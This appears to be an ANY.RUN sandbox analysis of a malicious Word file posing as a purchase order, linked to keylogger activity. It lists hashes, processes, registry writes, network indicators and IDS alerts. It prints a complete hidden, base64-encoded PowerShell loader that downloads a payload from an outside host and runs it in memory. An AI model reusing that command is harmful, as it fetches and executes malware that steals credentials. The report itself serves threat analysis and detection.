| File name: | PURCHASE ORDER_0886754.docx |
| Full analysis: | https://app.any.run/tasks/80e53056-3128-44b2-ad05-67897d9915cc |
| Verdict: | Malicious activity |
| Threats: | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. |
| Analysis date: | January 26, 2026, 17:26:12 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
| File info: | Microsoft Word 2007+ |
| MD5: | 4D82F99F5F9523A1CA6E58F151A3C735 |
| SHA1: | 73A2C49379D88516821AD8325E0FE84A058325F1 |
| SHA256: | A336288CF2D4517D6FCB620338222187273070FF8A28025849E2DFEDA56D4982 |
| SSDEEP: | 24576:jDj1l74u42NDxK/fn40AYeKSl4OcfmbXvpLMwEIHCS:jDj1l74u42NDxK/f40AYeKSl4OcfmbXX |
| .docx | | | Word Microsoft Office Open XML Format document (52.2) |
|---|---|---|
| .zip | | | Open Packaging Conventions container (38.8) |
| .zip | | | ZIP compressed archive (8.8) |
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0002 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2026:01:26 17:56:16 |
| ZipCRC: | 0x29502273 |
| ZipCompressedSize: | 425 |
| ZipUncompressedSize: | 2492 |
| ZipFileName: | [Content_Types].xml |
| Template: | Normal.dotm |
|---|---|
| TotalEditTime: | 2 minutes |
| Pages: | 1 |
| Words: | - |
| Characters: | - |
| Application: | Microsoft Office Word |
| DocSecurity: | None |
| Lines: | 1 |
| Paragraphs: | 1 |
| ScaleCrop: | No |
| Company: | Grizli777 |
| LinksUpToDate: | No |
| CharactersWithSpaces: | - |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| AppVersion: | 12 |
| Keywords: | - |
| LastModifiedBy: | 91974 |
| RevisionNumber: | 2 |
| CreateDate: | 2026:01:25 07:15:00Z |
| ModifyDate: | 2026:01:25 07:17:00Z |
| Title: | - |
|---|---|
| Subject: | - |
| Creator: | 91974 |
| Description: | - |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 604 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=109.0.5414.149 "--annotation=exe=C:\Program Files\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win32 "--annotation=prod=Microsoft Edge" --annotation=ver=109.0.1518.115 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd8,0x688ef598,0x688ef5a8,0x688ef5b4 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 844 | C:\Windows\system32\svchost.exe -k LocalService | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: LOCAL SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 864 | powershell -NoProfile -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGd1YXJkYWdlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZ3VhcmRhZ2UuSGVhZGVycy5BZGQoIlVzZXItQWdlbnQiLCAiTW96aWxsYS81LjAiKTskZ3VhcmRhZ2UuSGVhZGVycy5BZGQoIkFjY2VwdCIsICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgiKTskZ3VhcmRhZ2UuSGVhZGVycy5BZGQoIkFjY2VwdC1MYW5ndWFnZSIsICJlbi1VUyxlbjtxPTAuOSIpOyR2b3hlbGF0aW5nID0gJyNAQCUkOi8vZGlnaUAkZ3JvdSUuY29tL3clLWluY2x1ZGUkL3p6L28lQGltaXplZF9NU0kuJW5nJy5SZXBsYWNlKCcjJywgJ2gnKS5SZXBsYWNlKCdAJywgJ3QnKS5SZXBsYWNlKCclJywgJ3AnKS5SZXBsYWNlKCckJywgJ3MnKTskZGVtb2NyYXRpemluZyA9ICRndWFyZGFnZS5Eb3dubG9hZERhdGEoJHZveGVsYXRpbmcpOyRCZW5qaSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkZGVtb2NyYXRpemluZyk7aWYgKCRCZW5qaSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJykgeyAgJGNvbWVsaWVzdCA9ICRtYXRjaGVzWzFdOyAgJG9jdGV0cyA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGNvbWVsaWVzdCkpOyAgJGFyZ3NCYXNlNjQgPSAnSnpCb1NHUjFZMVJOTWxGNlRYZFphazE0UVdwT2VVRnFUV1k1YldSd1ZsaGplVVl5VEhRNU1sbDFRVmhrZGtveldtcE9WMXAxT1hsTU5rMUlZekJTU0dFbkxDY3dKeXduUXpwY1ZYTmxjbk5jVUhWaWJHbGpYRVJ2ZDI1c2IyRmtjMXduTENkT1lXMWxYMFpwYkdVbkxDZGhjM0J1WlhSZlkyOXRjR2xzWlhJbkxDY25MQ2RoYzNCdVpYUmZZMjl0Y0dsc1pYSW5MQ2N3Snl3blZWSk1KeXduUXpwY1ZYTmxjbk5jVUhWaWJHbGpYRVJ2ZDI1c2IyRmtjMXduTENkT1lXMWxYMFpwYkdVbkxDZDJZbk1uTENjeEp5d25NQ2NzSjFSaGMydGZUbUZ0WlNjc0p6QW5MQ2NuTENjbkxDY24nOyAgJGFyZ3NTdHJpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRhcmdzQmFzZTY0KSk7ICAkYXJncyA9ICRhcmdzU3RyaW5nIC1zcGxpdCAnLCcgfCBGb3JFYWNoLU9iamVjdCB7ICRfLlRyaW0oJycnIicgKSB9OyAgW1NvZnR3YXJlLlByb2dyYW1dLkdldE1ldGhvZCgiTWFpbiIpLkludm9rZSgkbnVsbCwgJGFyZ3MpO30=')) | Invoke-Expression" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WmiPrvSE.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1092 | C:\Windows\system32\svchost.exe -k NetworkService | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1196 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --mojo-platform-channel-handle=3852 --field-trial-handle=1312,i,18000466048256133651,8240373282230828476,131072 --enable-features=msMicrosoftRootStoreUsed /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1568 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2224 --field-trial-handle=1312,i,18000466048256133651,8240373282230828476,131072 --enable-features=msMicrosoftRootStoreUsed /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1596 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --mojo-platform-channel-handle=1432 --field-trial-handle=1312,i,18000466048256133651,8240373282230828476,131072 --enable-features=msMicrosoftRootStoreUsed /prefetch:3 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | msedge.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1844 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --disable-quic --mojo-platform-channel-handle=4520 --field-trial-handle=1312,i,18000466048256133651,8240373282230828476,131072 --enable-features=msMicrosoftRootStoreUsed /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1852 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --disable-quic --mojo-platform-channel-handle=3364 --field-trial-handle=1312,i,18000466048256133651,8240373282230828476,131072 --enable-features=msMicrosoftRootStoreUsed /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1856 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --mojo-platform-channel-handle=1648 --field-trial-handle=1312,i,18000466048256133651,8240373282230828476,131072 --enable-features=msMicrosoftRootStoreUsed /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| (PID) Process: | (1092) svchost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache\Intranet |
| Operation: | write | Name: | {4040CF00-1B3E-486A-B407-FA14C56B6FC0} |
Value: D4DA6D46C9DD | |||
| (PID) Process: | (4044) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | ;x> |
Value: 3B783E00CC0F0000010000000000000000000000 | |||
| (PID) Process: | (4044) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (4044) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: Off | |||
| (PID) Process: | (4044) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: Off | |||
| (PID) Process: | (4044) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: Off | |||
| (PID) Process: | (4044) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: Off | |||
| (PID) Process: | (4044) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: Off | |||
| (PID) Process: | (4044) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: Off | |||
| (PID) Process: | (4044) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: Off | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4044 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF0BB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3884 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF1120c4.TMP | — | |
MD5:— | SHA256:— | |||
| 3884 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 3884 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF112102.TMP | — | |
MD5:— | SHA256:— | |||
| 3884 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old | — | |
MD5:— | SHA256:— | |||
| 844 | svchost.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-S-1-5-21-1302019708-1500728564-335382590-1000.dat | — | |
MD5:— | SHA256:— | |||
| 3884 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\LOG.old~RF1121cd.TMP | — | |
MD5:— | SHA256:— | |||
| 3884 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\LOG.old | — | |
MD5:— | SHA256:— | |||
| 3884 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old | text | |
MD5:B26BE1B753F69CC84F595E0C1AC346A3 | SHA256:6F40DB7CBB2EFB5E0B6B0C58CA5F543946F0BFF9415D332EDD9842B4FB648EAC | |||
| 3884 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Variations | text | |
MD5:961E3604F228B0D10541EBF921500C86 | SHA256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4044 | WINWORD.EXE | OPTIONS | 400 | 90.126.200.83:443 | https://minily.org/ | unknown | — | — | unknown |
4044 | WINWORD.EXE | HEAD | 307 | 90.126.200.83:443 | https://minily.org/CNTJlcOHW | unknown | — | — | unknown |
844 | svchost.exe | OPTIONS | 400 | 90.126.200.83:443 | https://minily.org/ | unknown | — | — | unknown |
844 | svchost.exe | OPTIONS | 400 | 90.126.200.83:443 | https://minily.org/ | unknown | — | — | unknown |
844 | svchost.exe | OPTIONS | 400 | 90.126.200.83:443 | https://minily.org/ | unknown | — | — | unknown |
844 | svchost.exe | OPTIONS | 400 | 90.126.200.83:443 | https://minily.org/ | unknown | — | — | unknown |
4044 | WINWORD.EXE | HEAD | 307 | 90.126.200.83:443 | https://minily.org/CNTJlcOHW | unknown | — | — | unknown |
1596 | msedge.exe | GET | 200 | 150.171.22.17:443 | https://config.edge.skype.com/config/v1/Edge/109.0.1518.115?clientId=-626569875466424637&agents=Edge%2CEdgeConfig%2CEdgeServices%2CEdgeFirstRun%2CEdgeFirstRunConfig%2CEdgeDomainActions&osname=win&client=edge&channel=stable&scpfull=0&scpguard=1&scpfre=0&scpver=18&osarch=x86&osver=6.1.7601&wu=0&devicefamily=desktop&uma=1&sessionid=16&mngd=0&installdate=1604373552&edu=0&bphint=0 | unknown | text | 37.1 Kb | unknown |
4044 | WINWORD.EXE | GET | 307 | 90.126.200.83:443 | https://minily.org/CNTJlcOHW | unknown | html | 13.0 Kb | unknown |
1596 | msedge.exe | GET | 200 | 150.171.27.11:443 | https://edge.microsoft.com/extensionwebstorebase/v1/crx?os=win&arch=x86&os_arch=x86&nacl_arch=x86-32&prod=edgecrx&prodchannel=&prodversion=109.0.1518.115&lang=en-US&acceptformat=crx3&x=id%3Djmjflgjpcpepeafmmgdpfkogkghcpiha%26v%3D1.2.1%26installedby%3Dother%26uc%26ping%3Dr%253D623%2526e%253D1 | unknown | xml | 413 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | Not routed | — | whitelisted |
4 | System | 192.168.100.255:138 | — | Not routed | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | whitelisted |
4044 | WINWORD.EXE | 90.126.200.83:443 | minily.org | France Telecom - Orange | FR | unknown |
1092 | svchost.exe | 224.0.0.252:5355 | — | — | — | whitelisted |
1596 | msedge.exe | 150.171.22.17:443 | config.edge.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
3884 | msedge.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
1596 | msedge.exe | 150.171.27.11:443 | edge.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
1596 | msedge.exe | 90.126.200.83:443 | minily.org | France Telecom - Orange | FR | unknown |
1596 | msedge.exe | 84.38.129.44:80 | — | DATACLUB-NL | LV | unknown |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
minily.org |
| unknown |
config.edge.skype.com |
| whitelisted |
edge.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
x1.c.lencr.org |
| whitelisted |
r13.c.lencr.org |
| whitelisted |
go.microsoft.com |
| whitelisted |
activation.sls.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
1596 | msedge.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
— | — | Misc activity | ET USER_AGENTS Microsoft Office Existence Discovery User-Agent |
4044 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
4044 | WINWORD.EXE | Potentially Bad Traffic | ET HUNTING Microsoft Office User-Agent Requesting A Doc File |
4044 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
3432 | EQNEDT32.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host VBS Request |
— | — | Misc activity | INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0) |
— | — | Misc activity | INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0) |
1092 | svchost.exe | Device Retrieving External IP Address Detected | ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org) |
1092 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org) |